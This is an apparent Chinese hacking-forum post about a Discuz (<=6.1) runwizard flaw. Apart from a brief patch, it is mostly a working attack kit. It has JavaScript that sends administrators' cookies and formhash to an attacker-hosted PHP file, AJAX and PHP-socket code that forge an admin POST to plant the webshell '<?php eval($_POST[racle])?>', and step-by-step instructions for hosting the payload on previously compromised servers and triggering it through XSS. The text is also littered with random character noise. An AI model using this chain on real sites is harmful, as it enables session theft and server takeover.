Discuz XSS得webshell V3 N- V1 {4 { w8 f
By racle @tian6.com
6 A7 }' K9 P& s% |' c4 d; o) D- |+ D欢迎转帖.但请保留版权信息.
5 q* [ u, A/ ` c受影响版本 iscuz<=6.1.0,gbk+utf+big5# b" Y. [6 G3 J/ v4 Z. `
, y0 R: R( W1 ^1 E# n# |
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
5 y" ?% C, ~, q8 ]. q
$ s$ d" b l. y: s: M& S6 }/ H1 ~/ k. {3 ^0 f
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
* K0 ]5 C9 K/ I当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
6 |* ?! X( u) J
1 M1 b7 d. ]0 n分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
* W9 }! S- c/ j- ^9 x) f3 U本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
9 }* w7 [' w- \3 l5 Y8 J. }
, Q% r* p* K% a+ w- `
7 l! e- k6 s/ y" f----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------, J7 ?7 k9 i3 ^* t3 y
( q" R+ o( M( L$ ]3 x& S
6 g8 o2 K( m: kproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.: J# T0 ?' L9 @& y- Q9 a! `
* \8 g8 ]6 m t! Y/ T" b0 f1 ^; Sproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
, Z ^' Q4 m. ^1 z1 I$ b8 n5 m
9 n' |: y. O) a$ r9 I- sproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.0 G! r! f2 ], P# F2 c
$ a& Z" d) y' b
8 }6 U, b! T9 I1 @7 i; J2 H下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {. D% s2 r. ` a/ P: r
! t: @$ S0 L! ^3 S
global $runwizardfile, $runwizardhistory;
& F; P% I& w- @7 E
2 D$ l: v9 h! P2 I7 T' o( i $fp = fopen($runwizardfile, 'w');8 V( o O9 Y+ X$ J- N9 B) n0 J
5 K3 {( s8 H. r6 J" G2 o fwrite($fp, serialize($runwizardhistory));
; z! K' ?/ K$ m1 E) X8 z' r5 H6 g$ o! K5 V
fclose($fp);
* j8 _! E! P4 J+ ~8 v
- V0 K3 B( `' C0 Y}
" o/ ]8 v+ Q0 A1 v复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
% M$ {' b. @$ R' M7 z4 f以下是修补的办法:function saverunwizardhistory() {
+ q, F0 \0 q- T+ u
/ A5 k2 j! _, G global $runwizardfile, $runwizardhistory;
7 U S4 Y% {2 j( V4 l$ L0 D( Z
" {/ t% a5 r) U+ F1 S. U0 \5 J $fp = fopen($runwizardfile, 'w');
7 P1 ^$ d c$ j' ]9 \3 D% S+ c! v: @, `3 n' A& v( Z
$s = '<?php exit;?>';7 p/ p% r, N) f, F A2 @4 v% H! u, S
) t2 `/ V, k, V6 j# Z" U
$s .= serialize($runwizardhistory);' N% G2 s- _$ M
* O! K4 H1 G: ^9 [ fwrite($fp, $s);; R' U) H2 [6 q P
L: c1 S0 Z1 B
fclose($fp);
$ j; Y5 R! K7 G# {8 L' @2 B% T0 V9 E
}
1 {: n# [ M) f8 M8 J6 W( ~9 p复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
3 q: Z0 e s( j+ w( F) ?" P$ _& ~8 e+ x+ z1 A% L! r
l; K% n2 }3 y. @8 b U
5 ^4 R" @0 E- I. P& e3 q/ b* u----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------5 O& G {6 W% F, h
. O( t- f* `) g3 H
8 |" { f/ l; g9 X 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.: B, j) y0 T/ G, f6 G7 o
0 o1 {& J& ^3 M ]2 t
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
1 ~+ \/ C, \. j9 m r2 S2 }/ L) _5 s; z" v& d
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.8 P3 Y9 E' B) S0 R
7 r1 n. ~/ P" _9 p# q3 U/ Y首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
. ?7 r4 d `- J6 i
3 I# \/ B' g& s8 O% s( D! L0 I; \var url="http://目标网站/admincp.php";
, @. x( F3 }; X& w K* t. \; A# u2 r% e8 _2 e( A4 }
/*获得cookies*/ d- r4 R2 i/ G8 F( p1 w
" d, x c8 m; Z4 ^5 r4 rfunction getURL(s) {7 Q9 K8 E3 I9 M* {% e
. H7 C/ i K$ }& uvar image = new Image();7 D6 Y- H2 Z( ~6 @. J$ B) ^
5 Q; X* o5 @+ I, u2 m' }) E
image.style.width = 0;7 l+ R9 S" X% T n; d: `' O$ j
1 g9 S- y* x1 U7 A6 Z: P
image.style.height = 0;
. R$ m1 \8 k, h/ A( L$ I% y3 s c" N3 f$ ~6 D" U
image.src = s;
Q5 u! d: |9 p, A, W
5 _& G3 c7 @/ r- {1 _& g}4 |1 a% n8 U) X) M
* j1 F$ P! Z% n. QgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php/ I" g W) _' ?8 o1 z7 `& t* F
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];4 m! x: z3 i1 Z' g
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) ) S; N2 a. `; ?5 Q% R
( C, a% Y3 P6 A* ^1 ]5 z% {, D
) M0 p* w9 |8 R) P9 v5 D4 L获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
. c) I# G& z! ~- h- ]' u+ o4 @2 x5 c" D2 Q! d4 B
$ i, d; l( ^. x
! {. q- I% }+ g7 n% X, _# S! {" ~/*hash*/
+ |* A4 e9 Z9 j0 k5 x- [( P4 j' Q- N% I1 ]0 G
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");' ~/ I* N+ z8 N
" P3 Q7 D' |2 t$ K! W3 F
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
9 ~) r- J: V( F# e5 D n; ^
) m4 a9 k6 P+ CxmlHttpReq.send();
2 U! l7 }5 b4 I: e+ s- y0 _* V7 D, o& n) U
var resource = xmlHttpReq.responseText;% X ?$ O- ~! L% X, k3 r9 _
2 T- l8 o1 |) T/ h: M. X
var numero = resource.search(/formhash/);" N* o9 x4 g0 m ]1 d. R ?( I
: z9 v% ~7 U: r& G7 P# M
var formhash=encodeURIComponent(resource.substr(numero+17,8));
7 `" ]( u8 W8 O# X, G1 f9 V% q2 H
- `8 U6 k' d9 Y- }
% `7 ^4 S" X; Bvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
u8 P0 n( F q+ ]3 w3 a f D0 ~ u! X0 F* i7 S% }/ E: ?
xmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 6 U6 M" c1 e' N7 {3 l0 X3 d+ k
! g0 t6 z% f8 O" I2 VxmlHttpReq.setRequestHeader("Referer", url);) k% o& d3 c( Y, d* E) q* |0 u
0 ]; Z# L6 W: Z5 ^" Z2 b
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
. ^# K: e: A* A. L m' ], C, Y' n4 `- t e8 _) f
xmlHttpReq.setrequestheader("content-length",post.length); 9 ]$ l! r/ Q6 H( v
% M' Y# {5 o3 h7 V4 N+ t' \
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
5 ^' V- j2 G( v# y/ l% j u6 i" B) |* O' X7 ~
xmlHttpReq.send(post);//发送数据
+ i2 A" q6 q; E; S2 q复制代码这里HASH我假设正确,这样提交,也无须cookies9 \7 a: R3 {$ J8 g. v1 x1 k
7 S) v3 [5 U7 g: |) `& M. _4 s; n
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);) W4 B! t. a7 V5 X& t1 T8 e
3 k0 ^0 H% v' {; x/ c
if (!$sock) die("$errstr ($errno)\n");
E0 K* U ?& w/ j' {
& M& ?5 O* ~6 @* {* P$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';6 x5 R. {+ W, M, L; {* F* O# u
J5 b! r( l' H. \0 O9 w
' ~3 G( v2 m- M$ w- ^9 F- t. M; H! b4 D) K, v
fwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
; d Y. g, a( D1 [, _, \
' P' T2 ~: E2 M5 x0 W* @$ r' p5 G! `fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");6 H, t1 _. l: ?- Z+ Z
+ E" N0 h2 C# e: Z
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");" Y9 n. e9 J/ r& f3 ^/ ?
% Y3 r# d, K e( ?: X# e3 L
fwrite($sock, "Accept-Language: zh-cn\r\n");
/ N6 {; J2 v8 e# A" ]
2 {8 L+ D! O' ]7 efwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
$ n- ~2 I" T+ V, e! Y
: Y- j( F- g' Y+ s* X0 v5 yfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
# T) L- I, C" W6 d: r
* M! l; b* n( P1 h, ?; g" Jfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
2 z! f1 t7 u' e3 K9 Z) j2 S& ~: c( @+ T1 Y0 W4 v( d5 I0 J7 n
fwrite($sock, "Host: $url\r\n");+ ~" j: D; i; J' G. \
/ ?0 \! _. Q2 t* J
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
3 Q0 _2 C1 I4 e) K9 `. d" ]7 k
" Y6 V/ l, K( l3 J9 O p9 X$ qfwrite($sock, "Connection: Keep-Alive\r\n");/ w! e+ u; \, d: X9 Z; I' p
7 S" A, c" i% ?9 e
fwrite($sock, "Cache-Control: no-cache\r\n");( ` r* v: q9 W
9 f; _3 r4 Z) q* Rfwrite($sock, "Cookie:".$cookies."\r\n\r\n");
% @/ L4 g/ {, W7 q z" i* M
- d5 w" ?" n5 {) r; b/ H* @fwrite($sock, $data);% y- t, U9 e% i
: \# J0 S- y" T
: Y1 Y4 i7 j, H. q3 N, A
; s7 y6 j+ E. k8 g! P$headers = "";
+ R# a( V/ ?1 L4 A/ A: C) @3 Q
7 N8 G1 L3 V' Z3 m% W6 X6 twhile ($str = trim(fgets($sock, 4096)))
/ B- F6 Z+ W6 o ?# w. D
& I d+ Y) `8 E( f+ o* A $headers .= "$str\n"; x0 Q% `9 o _0 V/ C
$ K- U$ T2 g& O" a Vecho "\n";5 X' x4 d0 a! \6 M* g) _
& J7 |$ R' j0 \4 y: k$body = "";! W- q: m) p) Z+ `9 y7 o+ C+ h0 V
z* t; D8 ?) O% n) w& F$ {
while (!feof($sock))) L, [7 d! B3 a: p# S3 |
$ Z! s& k& G b; Q4 \ $body .= fgets($sock, 4096);
& y5 ^+ N+ ]2 X- ?
- p+ o* V5 v8 B) wfclose($sock);
- y5 m% Z( I% q0 S& q9 f5 y& H4 \* z3 ?' B
echo $body;' D" m7 O w! n; M
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^1 x% y" ]( {1 v& j+ S( ?
* B/ ~$ r4 M' p8 d* p" n0 `
5 h2 ~: }; g# {8 `-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
" m; J# W# r3 M- @9 f3 q1 i4 t& W
2 E; {7 s* C. X- R* S
G2 w5 r6 I* h! z1 |$ c+ Z" E1 HP SOCKET利用方法首先打开racle.js
v+ _5 b& G J4 k; d& u- o+ r, R
, a. h, E+ |3 g% U- G3 c6 s. ` c: rvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
- w+ a+ Q+ r: m8 D* d/ u0 H4 r5 C1 ?" j
) \. p; M( t1 P4 h4 w
! W& \- e1 `/ e. ?. k
然后打开racle@tian6.php
1 b% f& B3 L4 N, Q' b: |) m! b) C1 |. }& n* C
$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com: O0 h5 P8 z$ Z
7 o: s5 R3 \0 ?% a8 p. D* K: z5 l) ?8 K+ b8 ^" @/ p
) [0 y0 w( `6 y' F/ c; Q如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:' b: W; e; @0 u; G7 l& W
0 j4 G% ]" s0 t4 vgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));0 N1 N9 ~9 g% e1 E0 Q6 l
2 b% `( H; r7 t% `& _1 B; n- Z为: v: R* z/ d' c' ?5 x
2 |8 N7 ]& h9 h
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
+ z4 M( @6 p5 e. T9 ^) L+ i8 l8 `复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
s' y$ O& o( W7 l6 ?- s* b& Y& d; [" E1 c* r0 p5 g
& k) P$ |# a) l4 T; J
* }* w( i" N E9 A) { _如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
4 n) @! O4 c. b
" I' Y4 A6 W" L; Tvar formhash=encodeURIComponent(resource.substr(numero+17,8));$ I9 P) l. r8 A) a+ x3 y
# M0 I* K; a) ^8 h0 A! {( K
为6 J- P" Q9 n' z) _
9 b! G' z, i& D- v* o, M' Xvar formhash=encodeURIComponent(resource.substr(numero+9,8));
; x8 s7 u1 [: [* b3 S复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.- h8 X. x) h( {
3 Q |1 J8 a! {6 V
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.1 k: P! l: k* Y4 ?
! M% m' U4 S" s- M1 O如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.8 h% d \* q! t; u7 w
7 g2 I: r, J$ b b' q+ c# j# z5 ]
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
# p" z0 W- A! |2 M
. Y0 }8 M' Z* O. J- F) ^. F9 X |